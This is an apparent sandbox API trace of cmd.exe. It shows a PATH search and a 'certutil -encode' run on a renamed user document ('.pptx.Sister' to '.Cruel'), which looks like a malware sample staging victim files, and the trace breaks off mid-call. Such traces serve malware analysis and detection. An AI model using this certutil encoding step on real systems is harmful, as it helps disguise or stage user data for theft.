lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6cb3bab, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0307.455] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0307.455] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe1d0a343, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe1d0a343, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6cb3bab, dwReserved1=0xea2a58ee, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7ca60 [0307.455] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0307.456] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0307.456] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192b1c40, ftCreationTime.dwHighDateTime=0x1d5e90d, ftLastAccessTime.dwLowDateTime=0xae74540, ftLastAccessTime.dwHighDateTime=0x1d5ead5, ftLastWriteTime.dwLowDateTime=0xae74540, ftLastWriteTime.dwHighDateTime=0x1d5ead5, nFileSizeHigh=0x0, nFileSizeLow=0x1670b, dwReserved0=0x6cb3bab, dwReserved1=0xea2a58ee, cFileName="21UCEaK S0K_31H.pptx.Sister", cAlternateFileName="21UCEA~1.SIS")) returned 0x21ed8c7d060 [0307.456] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0307.456] _wcsnicmp (_String1="21UCEA~1.SIS", _String2="21UCEaK S0K_31H.pptx.Sister", _MaxCount=0x1b) returned 19 [0307.456] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0307.456] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0307.456] GetProcessHeap () returned 0x21ed8c70000 [0307.456] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7be40 [0307.456] ??_V@YAXPEAX@Z () returned 0x1 [0307.457] ??_V@YAXPEAX@Z () returned 0x1 [0307.457] GetProcessHeap () returned 0x21ed8c70000 [0307.457] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379e20, Size=0x230) returned 0x21ed9379e20 [0307.457] GetProcessHeap () returned 0x21ed8c70000 [0307.457] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379e20) returned 0x230 [0307.457] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0307.457] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.457] GetFileType (hFile=0x50) returned 0x2 [0307.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.457] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0307.458] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.458] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0307.466] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0307.466] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0307.466] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0307.466] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0307.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.466] GetFileType (hFile=0x50) returned 0x2 [0307.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.466] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0307.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.467] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0307.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.467] GetFileType (hFile=0x50) returned 0x2 [0307.467] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.467] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0307.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.468] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9379dc0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed9379dc0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0307.470] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\" ") returned 68 [0307.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.470] GetFileType (hFile=0x50) returned 0x2 [0307.470] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.470] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0307.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.470] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0307.471] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0307.471] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.471] GetFileType (hFile=0x50) returned 0x2 [0307.471] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0307.471] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0307.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.472] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0307.477] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0307.479] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0307.480] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0307.480] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0307.480] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0307.480] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0307.480] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0307.480] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0307.480] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0307.480] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0307.480] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0307.480] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0307.480] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0307.480] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0307.480] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0307.480] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0307.480] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0307.480] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0307.480] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0307.480] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0307.480] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0307.480] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0307.481] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0307.481] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0307.481] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0307.481] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0307.481] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0307.481] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0307.481] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0307.481] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0307.481] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0307.481] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0307.481] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0307.481] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0307.481] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0307.481] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0307.481] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0307.481] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0307.481] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0307.481] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0307.481] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0307.481] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0307.481] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0307.481] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0307.481] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0307.482] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0307.482] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0307.482] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0307.482] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0307.482] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0307.482] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0307.482] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0307.482] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0307.482] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0307.482] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0307.482] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0307.482] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0307.482] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0307.482] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0307.482] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0307.482] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0307.482] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0307.482] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0307.482] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0307.482] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0307.482] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0307.482] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0307.482] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0307.482] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0307.483] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0307.483] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0307.483] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0307.483] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0307.483] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0307.483] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0307.483] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0307.483] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0307.483] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0307.483] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0307.483] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0307.483] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0307.483] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0307.483] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0307.483] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0307.483] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0307.483] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0307.483] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0307.483] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0307.483] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0307.483] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0307.483] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0307.483] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0307.484] ??_V@YAXPEAX@Z () returned 0x1 [0307.484] GetProcessHeap () returned 0x21ed8c70000 [0307.484] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d45ef0 [0307.485] GetProcessHeap () returned 0x21ed8c70000 [0307.485] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96940 [0307.486] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0307.486] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0307.486] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0307.486] GetProcessHeap () returned 0x21ed8c70000 [0307.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93800f0 [0307.486] SetErrorMode (uMode=0x0) returned 0x0 [0307.486] SetErrorMode (uMode=0x1) returned 0x0 [0307.486] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9380100, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0xa6cf4fdb80*="Documents") returned 0x19 [0307.486] SetErrorMode (uMode=0x0) returned 0x1 [0307.486] GetProcessHeap () returned 0x21ed8c70000 [0307.486] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93800f0, Size=0x56) returned 0x21ed93800f0 [0307.487] GetProcessHeap () returned 0x21ed8c70000 [0307.487] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93800f0) returned 0x56 [0307.487] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0307.487] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0307.487] GetProcessHeap () returned 0x21ed8c70000 [0307.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c0) returned 0x21ed8d64a30 [0307.487] GetProcessHeap () returned 0x21ed8c70000 [0307.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x370) returned 0x21ed8d562b0 [0307.487] GetProcessHeap () returned 0x21ed8c70000 [0307.487] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d562b0, Size=0x1c2) returned 0x21ed8d64fa0 [0307.487] GetProcessHeap () returned 0x21ed8c70000 [0307.487] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64fa0) returned 0x1c2 [0307.487] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0307.487] GetProcessHeap () returned 0x21ed8c70000 [0307.488] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed937ee70 [0307.488] GetProcessHeap () returned 0x21ed8c70000 [0307.488] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ee70, Size=0x7e) returned 0x21ed937ee70 [0307.488] GetProcessHeap () returned 0x21ed8c70000 [0307.488] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ee70) returned 0x7e [0307.488] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0307.488] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0307.489] GetLastError () returned 0x2 [0307.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0307.489] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0307.489] GetLastError () returned 0x2 [0307.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0307.490] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0307.490] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0307.490] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0307.491] GetLastError () returned 0x2 [0307.491] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb20 [0307.491] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0307.491] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0307.491] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0307.491] ??_V@YAXPEAX@Z () returned 0x1 [0307.491] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0307.492] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0307.492] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0307.492] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0307.492] GetProcessHeap () returned 0x21ed8c70000 [0307.493] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45dd0 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0307.493] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0307.494] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0307.495] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0307.495] GetProcessHeap () returned 0x21ed8c70000 [0307.495] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45dd0) returned 1 [0307.495] GetProcessHeap () returned 0x21ed8c70000 [0307.495] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c957a0 [0307.496] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0307.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0307.496] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0307.496] _get_osfhandle (_FileHandle=0) returned 0x4c [0307.496] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0307.497] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Documents", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.pptx.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf50, dwThreadId=0x524)) returned 1 [0307.510] CloseHandle (hObject=0xa4) returned 1 [0307.510] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0307.510] GetProcessHeap () returned 0x21ed8c70000 [0307.510] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0307.510] GetEnvironmentStringsW () returned 0x21ed9980080* [0307.510] GetProcessHeap () returned 0x21ed8c70000 [0307.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d603e0 [0307.510] FreeEnvironmentStringsA (penv="=") returned 1 [0307.510] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0307.950] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0307.951] CloseHandle (hObject=0xa8) returned 1 [0307.951] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", 